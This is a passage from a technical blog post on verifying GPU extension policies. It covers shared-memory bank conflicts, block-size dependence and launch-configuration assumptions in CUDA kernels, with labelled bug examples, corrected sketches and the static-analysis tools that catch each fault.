&lt;strong&gt;Static taint + symbolic reasoning (GPUCheck-style):&lt;/strong&gt; identify conditions dependent on thread/lane id, and prove whether divergence is possible.(&lt;a href="https://webdocs.cs.ualberta.ca/~amaral/thesis/TaylorLloydMSc.pdf" rel="noopener noreferrer"&gt;WebDocs&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Divergence is the &lt;em&gt;core reason&lt;/em&gt; you can treat performance as correctness. Enforce &lt;strong&gt;warp-uniform control flow&lt;/strong&gt; for policies (or at least for any code path that triggers side effects / heavy helpers). If you can't prove uniformity, force "single-lane execution" of policy side effects (others become no-ops) to prevent warp amplification. Put a hard cap on the number of helper calls on any path, to bound the "divergence amplification factor."&lt;/p&gt;
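
&lt;p&gt;The three rules in this strategy (uniform branches run as written, unprovable branches with side effects fall back to a single lane, and paths over the helper cap are rejected) can be sketched as one decision function. This is an illustrative host-side model; the enum and function names are hypothetical, and it assumes a prior taint pass has already classified each branch.&lt;/p&gt;

```cpp
enum BranchKind { kWarpUniform, kThreadDependent };
enum Decision { kRunAllLanes, kRunLaneZeroOnly, kReject };

// Hypothetical load-time decision for one policy path.
//  - Paths exceeding the helper-call cap are rejected outright.
//  - Warp-uniform branches run as written.
//  - Thread-dependent branches that trigger side effects are demoted to
//    lane-0-only execution (the other lanes become no-ops).
//  - Thread-dependent branches without side effects are left alone.
constexpr Decision decide(BranchKind kind, bool has_side_effects,
                          int helper_calls, int helper_cap) {
  return helper_calls > helper_cap ? kReject
         : kind == kWarpUniform    ? kRunAllLanes
         : has_side_effects        ? kRunLaneZeroOnly
                                   : kRunAllLanes;
}

static_assert(decide(kWarpUniform, true, 2, 4) == kRunAllLanes,
              "uniform branch within the cap runs on all lanes");
static_assert(decide(kThreadDependent, true, 2, 4) == kRunLaneZeroOnly,
              "divergent side effects are forced onto lane 0");
static_assert(decide(kThreadDependent, false, 0, 4) == kRunAllLanes,
              "divergent branch without side effects is left alone");
static_assert(decide(kWarpUniform, true, 5, 4) == kReject,
              "paths over the helper cap are rejected");
```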

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Control-flow divergence is determined entirely by the policy's branch conditions and their dependence on thread IDs, providing strong soundness via taint analysis but low completeness (data-dependent branches that happen to be uniform at runtime are rejected).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier tracks which values depend on &lt;code&gt;threadIdx&lt;/code&gt;/&lt;code&gt;laneId&lt;/code&gt; (taint analysis). Branches on tainted values are either forbidden or force single-lane execution for side effects (others become no-ops). This bounds the "warp amplification factor" and prevents SIMT-amplified performance degradation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUCheck explicitly targets "branch divergence" as a performance problem via thread-divergent expression analysis; GKLEE reports "divergent warps" as performance bugs via symbolic exploration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Some safe data-dependent branches will be rejected. The gpu_ext design principle lists warp-uniform control flow as a load-time verification requirement, treating divergence as a correctness property (bounded overhead) rather than just an optimization concern. For kernel-level divergence analysis, use GPUCheck or GKLEE.&lt;/p&gt;




&lt;h3&gt;
  
  
  7) Shared-Memory Bank Conflicts [Performance, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Bank conflicts are a shared-memory–specific performance pathology: accesses serialize when multiple lanes in a warp hit different addresses in the same bank.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mi"&gt;31&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="c1"&gt;// stride of 32 words maps every lane to the same bank (illustrative)&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GKLEE explicitly lists "memory bank conflicts" among detected performance bugs.(&lt;a href="https://lipeng28.github.io/papers/ppopp12-gklee.pdf" rel="noopener noreferrer"&gt;Peng Li's Homepage&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static heuristic:&lt;/strong&gt; classify shared-memory index expressions by lane stride and bank mapping; warn if likely conflict.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policies use shared scratchpads (e.g., per-block staging), enforce a &lt;strong&gt;conflict-free access pattern&lt;/strong&gt; (e.g., contiguous per-lane indexing such as &lt;code&gt;base + threadIdx.x&lt;/code&gt;). A static heuristic can classify shared-memory index expressions by lane stride and bank mapping, rejecting or warning on patterns likely to cause conflicts. Shared memory should not be banned entirely for this performance issue—it remains useful for legitimate policy scratchpads.&lt;/p&gt;
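
&lt;p&gt;A minimal sketch of such a heuristic, assuming 32 banks of 4-byte words and 4-byte elements indexed as &lt;code&gt;base + lane * stride&lt;/code&gt;. The names &lt;code&gt;gcd_int&lt;/code&gt; and &lt;code&gt;bank_conflict_degree&lt;/code&gt; are hypothetical helpers for illustration, not part of any existing verifier:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Assumption: 32 banks, 4-byte words, one 4-byte element per lane.
__host__ __device__ inline int gcd_int(int a, int b) {
  while (b != 0) { int t = a % b; a = b; b = t; }
  return a;
}

// Worst-case number of lanes in a warp that hit the same bank with
// distinct addresses when lane i accesses word (base + i * stride).
// 1 means conflict-free; 32 means fully serialized.
__host__ __device__ inline int bank_conflict_degree(int stride) {
  if (stride == 0) return 1;              // same word for all lanes: broadcast
  int s = stride &amp;lt; 0 ? -stride : stride;
  return gcd_int(s, 32);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Under these assumptions, stride 1 (&lt;code&gt;base + threadIdx.x&lt;/code&gt;) gives degree 1, while the stride-32 access in the bug example gives degree 32; a verifier could reject anything above a chosen threshold.&lt;/p&gt;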

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-heuristic. Enforcing conflict-free access patterns on shared memory eliminates most bank conflicts while still allowing policies to use shared scratchpads for legitimate purposes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Policies using shared memory are restricted to conflict-free index patterns (&lt;code&gt;base + threadIdx.x&lt;/code&gt; for contiguous access). The verifier statically checks shared-memory index expressions and rejects patterns with likely bank conflicts (e.g., stride-32 access). This preserves shared memory availability for per-block staging and aggregation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GKLEE explicitly lists "memory bank conflicts" among detected performance bugs via symbolic exploration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Some safe but complex index patterns may be conservatively rejected. Kernel-level bank conflict analysis requires GPUDrano-style static tools or profiling. Policies needing non-trivial shared-memory access patterns may need to demonstrate conflict-freedom through annotations or simplified indexing.&lt;/p&gt;




&lt;h3&gt;
  
  
  8) Block-Size Dependence [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Block-size independence is essential for safe block-size tuning. Kernels that implicitly depend on specific &lt;code&gt;blockDim&lt;/code&gt; values can produce incorrect results or races when launched with different configurations. This is critical for auto-tuning and portability across GPU generations. This entry focuses on &lt;strong&gt;compile-time hardcoded assumptions&lt;/strong&gt; within the kernel code itself (e.g., fixed shared memory sizes, hardcoded reduction strides), distinct from runtime launch configuration assumptions about grid dimensions.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;reduce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="c1"&gt;// Hardcoded reduction assumes exactly 256 threads&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;128&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;128&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;  &lt;span class="c1"&gt;// reads uninitialized s[] entries if blockDim.x &amp;lt; 256&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;                         &lt;span class="c1"&gt;// if blockDim.x &amp;gt; 256: the s[tid] store above is OOB and extra inputs are dropped&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="c1"&gt;// ... continues with warp-level reduction ...&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;// Launched with blockDim.x != 256 =&amp;gt; wrong results or crash&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUDrano explicitly includes "block-size independence" analysis.(&lt;a href="https://github.com/upenn-acg/gpudrano-static-analysis_v1.0" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static analysis (GPUDrano):&lt;/strong&gt; analyze kernel code for implicit blockDim dependencies.&lt;/li&gt;
&lt;li&gt;Require explicit declaration of block-size assumptions in kernel metadata.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Policies should not implicitly assume block shapes unless the verifier can guarantee them. If a policy depends on block-level structure, require declaring it (metadata) and validate at attach time. Add verifier rules that forbid hard-coded assumptions about blockDim unless explicitly declared.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E) if block-agnostic; Combined (C) if assumes blockDim. Contract-based for blockDim-dependent policies: conditional soundness (sound if declared requirements match actual launch config) with high completeness (policies can declare requirements; undeclared policies assumed block-agnostic).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Two approaches enable verification: (A) Block-agnostic design: policies use only lane-local or warp-level logic, avoiding &lt;code&gt;blockDim&lt;/code&gt; dependencies entirely, making them safe for any launch config; (B) Contract-based: policies declare block-size requirements in metadata, and the runtime validates at attach time. The verifier rejects policies with hardcoded block-size constants unless explicitly declared.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUDrano explicitly includes "block-size independence" analysis for detecting implicit blockDim dependencies in kernel code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies with undeclared blockDim dependencies may fail silently with different launch configs. The contract approach shifts responsibility to policy authors to declare requirements correctly. Recommended design: make policy APIs block-agnostic (use relative indices, not absolute sizes).&lt;/p&gt;
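
&lt;p&gt;As a rough illustration of the block-agnostic style, the reduction from the bug example could be written against &lt;code&gt;blockDim.x&lt;/code&gt; rather than a fixed 256. This is a sketch, not a prescribed fix; the kernel name &lt;code&gt;reduce_any_block&lt;/code&gt; and the dynamic shared-memory sizing are assumptions:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Assumption: launched with blockDim.x * sizeof(float) bytes of dynamic shared
// memory, e.g. reduce_any_block&amp;lt;&amp;lt;&amp;lt;grid, block, block * sizeof(float)&amp;gt;&amp;gt;&amp;gt;(out, in, n).
__global__ void reduce_any_block(float* out, const float* in, int n) {
  extern __shared__ float s[];              // sized at launch, not hardcoded
  int tid = threadIdx.x;
  int i = blockIdx.x * blockDim.x + tid;
  s[tid] = (i &amp;lt; n) ? in[i] : 0.0f;          // guard the tail block
  __syncthreads();
  // Tree reduction driven by blockDim.x; also handles non-power-of-two sizes.
  for (int active = blockDim.x; active &amp;gt; 1; ) {
    int half = (active + 1) / 2;            // elements that survive this step
    if (tid &amp;lt; active / 2) s[tid] += s[tid + half];
    __syncthreads();                        // reached by every thread: loop bounds are uniform
    active = half;
  }
  if (tid == 0) out[blockIdx.x] = s[0];     // one partial sum per block
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Nothing in the kernel body names a concrete block size, so the same code stays valid when the launch configuration is retuned.&lt;/p&gt;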




&lt;h3&gt;
  
  
  9) Launch Config Assumptions [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Many CUDA kernels assume certain launch configurations (e.g., single block, specific grid dimensions). Violating these assumptions leads to incorrect results or races that are hard to diagnose. This entry focuses on &lt;strong&gt;runtime launch configuration assumptions&lt;/strong&gt; (gridDim, number of blocks), distinct from compile-time hardcoded block-size dependencies within the kernel code.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;reduce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;out&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;  &lt;span class="c1"&gt;// BUG: assumes gridDim.x == 1, writes final result directly&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;              &lt;span class="c1"&gt;// if gridDim.x &amp;gt; 1, multiple blocks race on *out&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;// Called with &amp;lt;&amp;lt;&amp;lt;N/256, 256&amp;gt;&amp;gt;&amp;gt; where N &amp;gt;= 512 (more than one block) =&amp;gt; data race, wrong result&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Wu et al.'s discussion of detected bugs includes developer responses that kernels "should not be called with more than one block" and suggests adding assertions like &lt;code&gt;assert(gridDim.x == 1)&lt;/code&gt;.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Contract checking:&lt;/strong&gt; encode launch preconditions (gridDim, blockDim assumptions) and enforce them at runtime or statically.&lt;/li&gt;
&lt;li&gt;Add runtime assertions for grid/block dimension assumptions.&lt;/li&gt;
&lt;/ul&gt;
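
&lt;p&gt;The runtime-assertion variant might look like the following sketch, which turns the implicit assumptions of the bug example into device-side &lt;code&gt;assert&lt;/code&gt; checks. The kernel name is hypothetical, and device asserts are compiled out when &lt;code&gt;NDEBUG&lt;/code&gt; is defined, so this is a debugging aid rather than a production guarantee:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;#include &amp;lt;cassert&amp;gt;

// Sums at most blockDim.x elements of in[] into *out, using a single block.
__global__ void reduce_single_block(float* out, const float* in, int n) {
  // Make the launch assumptions explicit instead of implicit.
  assert(gridDim.x == 1);                            // only one block may write *out
  assert(blockDim.x &amp;lt;= 256);                         // must fit s[256]
  assert((blockDim.x &amp;amp; (blockDim.x - 1)) == 0);      // halving loop needs a power of two
  __shared__ float s[256];
  int tid = threadIdx.x;
  s[tid] = (tid &amp;lt; n) ? in[tid] : 0.0f;               // gridDim.x == 1, so the global index is tid
  __syncthreads();
  for (int stride = blockDim.x / 2; stride &amp;gt; 0; stride &amp;gt;&amp;gt;= 1) {
    if (tid &amp;lt; stride) s[tid] += s[tid + stride];
    __syncthreads();
  }
  if (tid == 0) *out = s[0];
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;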

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policy code assumes a particular block/warp mapping (e.g., keys use &lt;code&gt;threadIdx.x&lt;/code&gt; directly), it can regress in correctness or performance when the kernel runs under a different launch config. If a policy depends on warp- or block-level structure, require declaring it (metadata) and validate at attach time.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Combined (C): launch configuration is host-determined, not visible to policy verifier. Contract-based assurance: conditional soundness (sound only if contracts are correctly specified and validated) with completeness depending on contract expressiveness.&lt;/p&gt;

